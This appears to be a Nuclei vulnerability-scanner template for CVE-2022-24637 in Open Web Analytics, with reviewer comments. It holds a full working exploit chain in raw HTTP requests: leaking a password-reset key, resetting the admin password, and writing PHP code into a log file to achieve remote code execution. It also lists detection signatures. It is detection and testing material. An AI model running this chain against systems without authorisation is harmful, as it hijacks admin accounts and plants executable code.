nuclei-templates/http/cves/2022/CVE-2022-24637.yaml


# Nuclei template for CVE-2022-24637 (Open Web Analytics before 1.7.4).
# Seven chained http blocks plus one javascript step, ordered by `flow`:
#   1. login probe with a wrong password ("Login Failed" expected);
#   2. read a cached serialized user object from owa-data/caches/ that leaks temp_passkey;
#   JS: pull the 32-hex temp_passkey out of the decoded object;
#   3. use it as owa_k to set the admin password to {{password}};
#   4. log in as admin and capture the owa_p session cookie;
#   5. read owa_nonce from the general-options page;
#   6. point base.error_log_file at a .php path under owa-data/caches/;
#   7. write a marker through a config key, then fetch the resulting file.
# NOTE(review): steps 3, 6 and 7 change server state (admin password, two
# config keys, a file under owa-data/caches/) and nothing here reverts them;
# this is what the `intrusive` tag signals. Fixed upstream in 1.7.4 (see the
# description and the release reference below).
# Detection: GETs for /owa-data/caches/*.php, and base.optionsUpdate posts
# whose base.error_log_file ends in .php or that carry owa_config[shell].
# NOTE(review): the trailing `# digest:` line signs this template; editing
# it (even adding comments) presumably requires re-signing -- confirm.
id: CVE-2022-24637
info:
name: Open Web Analytics 1.7.3 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
# NOTE(review): the first reference URL contains a doubled slash
# ("master//modules"); it still resolves on GitHub but could be tidied.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/open_web_analytics_rce.rb
- http://packetstormsecurity.com/files/171389/Open-Web-Analytics-1.7.3-Remote-Code-Execution.html
- https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/tag/1.7.4
- https://github.com/Pflegusch/CVE-2022-24637
- https://github.com/c0derpwner/HTB-pwned
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24637
cwe-id: CWE-269
epss-score: 0.84852
epss-percentile: 0.98585
cpe: cpe:2.3:a:openwebanalytics:open_web_analytics:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
vendor: openwebanalytics
product: open_web_analytics
shodan-query: cpe:"cpe:2.3:a:openwebanalytics:open_web_analytics"
tags: cve,cve2022,packetstorm,rce,intrusive,open-web-analytics
# password: the new admin password set in step 3 and reused to log in at step 4.
# secret / secret_b64: a random marker that the written file is expected to
# echo back, so the final matcher can tell "file was interpreted by PHP" from
# "file was merely served as text".
variables:
password: "{{randbase(8)}}@123!"
secret: "{{randstr}}"
secret_b64: "{{base64(secret)}}"
# Execution order. Matchers/extractors marked `internal: true` only feed the
# later steps and are not reported as findings on their own.
# NOTE(review): the seventh http block carries two raw requests (8 raw
# requests in total) while metadata.max-request is 6 -- confirm which count
# is intended.
flow: |
http(1);
http(2);
javascript();
http(3);
http(4); http(5); http(6); http(7);
# Extracts the 32-hex temp_passkey from the base64-decoded serialized PHP
# object captured in step 2; s:32:"..." is PHP's serialized-string form.
# The last expression (temp_pass) is the value handed back to step 3 as
# {{javascript_response}}.
javascript:
- code: |
idx=serobj.indexOf('temp_passkey');
passubstr=serobj.substring(idx,idx+120);
temp_pass=(passubstr.match(/s:32:"([a-f0-9]{32})"/)[1])
temp_pass
args:
serobj: "{{base64_decode(serializedobj)}}"
http:
# Step 1: login probe with a deliberately wrong password; "Login Failed"
# in the body confirms the OWA login handler is reachable.
- raw:
- |
POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
owa_user_id=admin&owa_password=wrong+password+xyz&owa_go=&owa_action=base.login&owa_submit_btn=Login
matchers:
- type: word
part: body
words:
- "Login Failed"
internal: true
# Step 2: fetch the cached user object. The hashed file name is constant --
# presumably a deterministic cache key for the admin user; verify against
# the OWA cache code. Both the regex and the word matcher intentionally
# match a literal backslash-n (`\\n` in a single-quoted regex; an unquoted
# plain scalar below): per the description the vulnerable build writes the
# file from a single-quoted '<?php\n' string, so PHP never executes it and
# the base64 payload is served as text.
# NOTE(review): quoting the word as '<?php\n' would make the literal
# backslash explicit without changing the match.
- raw:
- |
GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: serializedobj
internal: true
regex:
- '<\?php\\n\/\*([A-Za-z0-9=]+)\*\/\\n\?>'
matchers:
- type: word
part: body
words:
- <?php\n
internal: true
# Step 3: reset the admin password to {{password}}, using temp_passkey as
# owa_k. State-changing: the original admin password is not restored.
# NOTE(review): a 302 whose Location carries owa_status_code=3006 is taken
# as success; the meaning of that code is not documented here -- confirm.
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
owa_password={{password}}&owa_password2={{password}}&owa_k={{javascript_response}}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password
matchers:
- type: dsl
dsl:
- "contains(location,'owa_status_code=3006')"
- "status_code==302"
internal: true
condition: and
# Step 4: log in with the new password; success is a 302 that sets the
# owa_p cookie, which the following steps reuse.
- raw:
- |
POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
owa_user_id=admin&owa_password={{password}}&owa_go=&owa_action=base.login&owa_submit_btn=Login
matchers:
- type: dsl
dsl:
- "contains(set_cookie,'owa_p')"
- "status_code==302"
internal: true
condition: and
# Step 5: load the general-options page as admin and extract owa_nonce for
# the two optionsUpdate posts that follow.
# NOTE(review): {{http_4_owa_p}} is presumably the owa_p cookie value from
# the step-4 response -- confirm the http_<n>_<name> naming.
- raw:
- |
GET /index.php?owa_do=base.optionsGeneral HTTP/1.1
Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: nonce
internal: true
regex:
- 'name="owa_nonce" value="([a-z0-9]+)">'
# Step 6: redirect the error log to a .php file under owa-data/caches/ and
# raise the log level. State-changing; the settings are not reverted.
# NOTE(review): relies on {{randstr}} resolving to the same value here and
# in step 7 -- presumably evaluated once per run; confirm.
- raw:
- |
POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
Host: {{Hostname}}
Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
Content-Type: application/x-www-form-urlencoded
owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2
# Step 7: submit the marker through a config key so it is written into the
# error-log file, then fetch that file. The final matcher needs both the
# '[debug_log]' prefix (the log was written) and the decoded {{secret}}
# (the file was interpreted). The written file remains on the server.
- raw:
- |
POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
Host: {{Hostname}}
Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
Content-Type: application/x-www-form-urlencoded
owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[shell]=<?php+echo base64_decode('{{secret_b64}}');?>
- |
GET /owa-data/caches/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '[debug_log]'
- "{{secret}}"
condition: and
# digest: 4a0a00473045022100e94386ddc33681e185a6c154e69b5501a492605b69fffc69959a9f2985a7c06702201ff3aeb6c72b0bfa5ff0ae95eabef98133abc3a2665abe135cb5f13877b171b1:922c64590222798bb761d5b6d8e72950